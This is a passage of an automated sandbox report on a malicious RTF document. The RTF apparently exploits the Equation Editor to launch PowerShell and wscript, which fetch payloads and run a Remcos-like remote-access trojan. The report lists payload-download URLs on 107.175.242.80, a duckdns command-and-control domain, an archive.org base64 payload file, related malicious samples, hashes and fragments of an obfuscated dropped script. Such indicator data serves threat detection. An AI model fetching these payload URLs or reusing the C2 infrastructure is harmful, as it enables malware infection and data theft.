              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://secure.comodo.com/CPS00%URL Reputationsafe
              http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ia600100.us.archive.org
              207.241.227.240
              truefalse
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  2024remcmon.duckdns.org
                  192.210.214.9
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://107.175.242.80/430/KNOCC.txttrue
                      unknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      unknown
                      http://107.175.242.80/430/sweetbuddygirltodaysherewith.tIFtrue
                        unknown
                        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                          unknown
                          2024remcmon.duckdns.orgtrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://go.microsoft.cvpowershell.exe, 00000008.00000002.376569393.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ocsp.entrust.net03powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtxwp;Aonbase64Contentpowershell.exe, 00000008.00000002.376723049.000000000249A000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://107.175.242.80/430/sweetbuddygirltodaysherewith.tIFjEQNEDT32.EXE, 00000002.00000002.355352588.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://go.microspowershell.exe, 00000008.00000002.376723049.0000000002AC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://107.175.242.80powershell.exe, 00000008.00000002.376723049.0000000002609000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.378809555.0000000003389000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://ia600100.us.archive.orgpowershell.exe, 00000008.00000002.376723049.000000000249A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.382634870.0000000002426000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.376723049.0000000002361000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.381278293.00000000050CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.dmtf.orwscript.exe, 00000005.00000003.355492637.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355676852.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355527668.0000000002B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            107.175.242.80
                                            unknownUnited States
                                            36352AS-COLOCROSSINGUStrue
                                            192.210.214.9
                                            2024remcmon.duckdns.orgUnited States
                                            36352AS-COLOCROSSINGUStrue
                                            178.237.33.50
                                            geoplugin.netNetherlands
                                            8455ATOM86-ASATOM86NLfalse
                                            207.241.227.240
                                            ia600100.us.archive.orgUnited States
                                            7941INTERNET-ARCHIVEUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1528438
                                            Start date and time:2024-10-07 22:40:08 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 2s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:16
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:beNwFiUxpf.rtf
                                            renamed because original name is a hash value
                                            Original Sample Name:72dd90d54b9dcfe691ff308a9cacb72f.rtf
                                            Detection:MAL
                                            Classification:mal100.rans.troj.spyw.expl.evad.winRTF@11/16@3/4
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 71
                                            • Number of non-executed functions: 200
                                            Cookbook Comments:
                                            • Found application associated with file extension: .rtf
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Active ActiveX Object
                                            • Scroll down
                                            • Close Viewer
                                            • Override analysis time to 76826.7909287323 for current running targets taking high CPU consumption
                                            • Override analysis time to 153653.581857465 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3316 because there are no executed function
                                            • Execution Graph export aborted for target powershell.exe, PID 3524 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: beNwFiUxpf.rtf
                                            TimeTypeDescription
                                            16:41:01API Interceptor289x Sleep call for process: EQNEDT32.EXE modified
                                            16:41:05API Interceptor118x Sleep call for process: powershell.exe modified
                                            16:41:05API Interceptor11x Sleep call for process: wscript.exe modified
                                            16:41:14API Interceptor5594429x Sleep call for process: RegAsm.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            107.175.242.80SecuriteInfo.com.Exploit.CVE-2017-11882.123.14512.27571.rtfGet hashmaliciousRemcosBrowse
                                            • 107.175.242.80/377/RBCRT.txt
                                            192.210.214.9IEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                              US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                RFQ#TLPO15-13.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
                                                    Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        ORDER 5172024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                178.237.33.50invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                HkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                2024remcmon.duckdns.orgIEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                • 192.210.214.9
                                                                US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 192.210.214.9
                                                                RFQ#TLPO15-13.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 192.210.214.9
                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                ORDER 5172024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                • 192.210.214.9
                                                                geoplugin.netinvoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                HkeU5FHEO1.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                ia600100.us.archive.orge6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                • 207.241.227.240
                                                                Wg3tf5MIzS.vbsGet hashmaliciousPureLog StealerBrowse
                                                                • 207.241.227.240
                                                                9gTW6ik1Z1.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                • 207.241.227.240
                                                                lcvKxaEBA3.vbsGet hashmaliciousPureLog StealerBrowse
                                                                • 207.241.227.240
                                                                vt4hGZq9md.vbsGet hashmaliciousPureLog StealerBrowse
                                                                • 207.241.227.240
                                                                NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 207.241.227.240
                                                                2Efe8RQhvR.vbsGet hashmaliciousPureLog StealerBrowse
                                                                • 207.241.227.240
                                                                o45q0zbdwt.vbsGet hashmaliciousPureLog StealerBrowse
                                                                • 207.241.227.240
                                                                OIQ1ybtQdW.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 207.241.227.240
                                                                5fKvwnCAeC.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                • 207.241.227.240
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS-COLOCROSSINGUSC72elF4p2o.exeGet hashmaliciousRedLine, XRedBrowse
                                                                • 198.12.90.244
                                                                na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                                • 192.227.146.254
                                                                invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                • 192.3.101.184
                                                                ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                • 107.175.130.20
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 107.172.130.147
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 192.210.150.29
                                                                na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                • 107.172.130.147
                                                                na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                • 172.245.123.6
                                                                na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                • 107.172.148.201
                                                                na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                • 172.245.123.9
                                                                AS-COLOCROSSINGUSC72elF4p2o.exeGet hashmaliciousRedLine, XRedBrowse
                                                                • 198.12.90.244
                                                                na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                                • 192.227.146.254
                                                                invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                • 192.3.101.184
                                                                ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                • 107.175.130.20
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 107.172.130.147
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 192.210.150.29
                                                                na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                • 107.172.130.147
                                                                na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                • 172.245.123.6
                                                                na.htaGet hashmaliciousCobalt StrikeBrowse
                                                                • 107.172.148.201
                                                                na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                • 172.245.123.9
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607dPO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 207.241.227.240
                                                                invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                • 207.241.227.240
                                                                ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                na.rtfGet hashmaliciousRemcosBrowse
                                                                • 207.241.227.240
                                                                No context
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unknown
                                                                Category:dropped
                                                                Size (bytes):4760
                                                                Entropy (8bit):4.834060479684549
                                                                Encrypted:false
                                                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unknown
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):236280
                                                                Entropy (8bit):3.7648240492046083
                                                                Encrypted:false
                                                                SSDEEP:3072:C3D5yTEc3Lyk0Qw81PBSH0Jcgt5p4Gwzd3y77iREYgKd8MBOcRxjhHlQTmG48jmW:CzAEcewL1IYixd3oCb98jV8S9
                                                                MD5:847293F65FBB8C1168A5FA7782EEDB3A
                                                                SHA1:6F82C998A5FA17A59C78430B4A32BE31D947F755
                                                                SHA-256:4CEA2DAD9EF99BC5FE90FB29BBCF18FC0C7893223ED2380F67DA3AC1BFB9FAC8
                                                                SHA-512:9E5AA5AFFBDA6E905BA3448B48F5F9EDE02BF24C2BCE4D4DE7A3B099D67EE6F38782AA0383F22793CDE63AE4C0B242068B6576DD467DBF8343CB06815477B482
                                                                Malicious:false
                                                                Preview:..K.R.t.L.o.i.i.L.b.c.R.R.C.P.p.h.U.a.v.K.p. .=. .".K.B.A.B.m.z.W.G.l.n.v.u.o.W.e.j.U.U.L.k.L.".....W.W.K.t.e.u.C.L.i.K.k.z.K.p.Z.b.L.L.R.b.G. .=. .".f.W.k.K.e.c.d.i.W.W.q.L.L.N.f.J.B.W.L.h.K.".....B.L.I.A.i.G.N.K.K.q.c.h.L.j.d.K.c.L.U.Z.c. .=. .".L.K.W.z.C.e.G.p.h.K.d.N.f.r.x.Q.K.t.f.L.l.".....f.L.L.z.o.T.k.o.H.u.L.G.f.u.P.K.A.s.h.B.A. .=. .".U.U.W.i.b.c.o.R.a.T.q.s.i.d.c.B.N.W.i.c.U.".....q.r.L.P.d.A.f.N.O.G.B.i.b.C.T.O.W.U.b.p.f. .=. .".G.B.I.K.u.d.c.L.p.R.O.c.T.W.G.m.T.o.N.k.v.".....P.z.G.W.U.i.a.c.c.u.K.z.W.U.C.P.I.W.Z.f.h. .=. .".P.h.c.G.U.i.f.d.n.L.t.L.P.K.L.z.b.h.K.U.j.".....Z.R.A.c.N.Z.U.Z.l.i.K.m.v.h.G.o.P.W.c.c.W. .=. .".e.A.I.U.d.T.e.K.Z.n.J.i.L.o.o.b.b.q.k.i.t.".....e.W.e.d.z.L.L.O.W.G.K.t.t.W.f.p.d.P.W.L.P. .=. .".O.B.G.U.L.f.s.C.z.x.G.t.i.f.I.L.Z.i.c.f.i.".....z.r.g.A.h.P.i.L.c.R.a.U.i.z.H.p.K.v.S.L.R. .=. .".G.o.G.P.P.L.I.P.g.n.f.t.z.G.B.k.a.B.c.p.b.".....l.h.W.k.S.K.L.K.u.c.m.R.k.C.h.L.U.O.G.G.q. .=. .".l.c.K.t.L.K.x.k.L.L.B.k.L.K.u.r.u.U.c.z.d.".........N.e.N.c.I.c.N.
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):962
                                                                Entropy (8bit):5.013811273052389
                                                                Encrypted:false
                                                                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                Malicious:false
                                                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:CE338FE6899778AACFC28414F2D9498B
                                                                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):0.05390218305374581
                                                                Encrypted:false
                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):7168
                                                                Entropy (8bit):3.4262880824793847
                                                                Encrypted:false
                                                                SSDEEP:96:wswdZU+Xu2IS/ljxBLAJsa/tnNACOdLZ9OLeLeVpJ8oHmR8FrEpK+AuCbBDbc3Zi:LwdqXo/q1tnNjOhaS+sUgN8gZi
                                                                MD5:11109320AE8133F9B35DDB1F6633D209
                                                                SHA1:45BDACA5DBA7AC19EFD77ECEF11C7C445050CFFF
                                                                SHA-256:B1675C67860AB0C399E628EBE7B126C1549F73268766A3812124FC0D815B1441
                                                                SHA-512:2650BF7051008E95A9B5D41174A080B623C853C7CF87788B3A5E23B90BB28F6957444423D21E5D1BA009CB6060D9AAAB9941CD9C319DB6FDFDF3476A3DD3A2EB
                                                                Malicious:false
                                                                Preview:......2.0.7.6.1.7.7.1.7.8.@.7.2.*...9.2.,.<.5.!...?.+.@.$.2.3.>.=.<.!.>.?.>.8.....2.-.?.:...(.'.?.`.!.]...<.,...%.|.6.(._.3.~.>.6.0.?.~.>.%.].<.?.].?.+.+.5._.'.!.%.#.-.@.,._.|.1.%.%.=.$.(.1.2.`.:...@.[.;...[.<.5...>.$...!.%.%.2._...6.#.?...6.`.5...?.!.#.?.$.9.,.?.6.?.:.4.(...6.8.[.9.3.=.?.;.1.?...`.].@.7.=.!.<.4.:.).<.4.(.[.=...,.1...5.&.=.?.,.].~.3.(.^.).-.(.6.).$.?.).^.?.8.,.?.6.2.,./.-.%.2.&.~.).^.+.$.&.$.|.?.].[.?.=.?.&.+.3.^.7.>.+.^.?.~.>.9.].1.+.4.9.<.).|.%.<.'./.^.?.@.-.?.=.>.,.,.7.%.%.#.$.1.#.<.0.=.4.?.#.0.?...!.1._.2.%.?.-.9.'.;.|._.?.1.;.4.?._.`...%.9.'.~.9.~.?.7.=.*.*.<...:.].%.|.?.....4.0.6.7.)...*.?.8.1.2.>.1._._.).?.9.0...`.9.?.?.7.@.,...1.*.4.*.4.=.@.].....!.[.>..._.5.<.=....._.?.:...4.`.(.^.1.'...=.3.2.5.*...2.4.|.|.|.#.&.|.~.'.).$...].....^.`._.&.?.$.=.%.;./.?.^.?.>.?./...|.1.(.;.4...?.:.%.6.+.2...'.?.7.9.?.;.&.?...).8.,.6.#.<./.=.^.1.?.?.].^.3.?.!.:.=.$...'.'.].8.7.`.;.>.(.%.6.2.%.*.'.0.&.+.?.%.>.@.@.9.3.@.`.@.?./.7./.?.[.'.?.4.?.'.4.8.`.=.5.:.(...0.?.<.!.?.-.%.#.:.:.
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
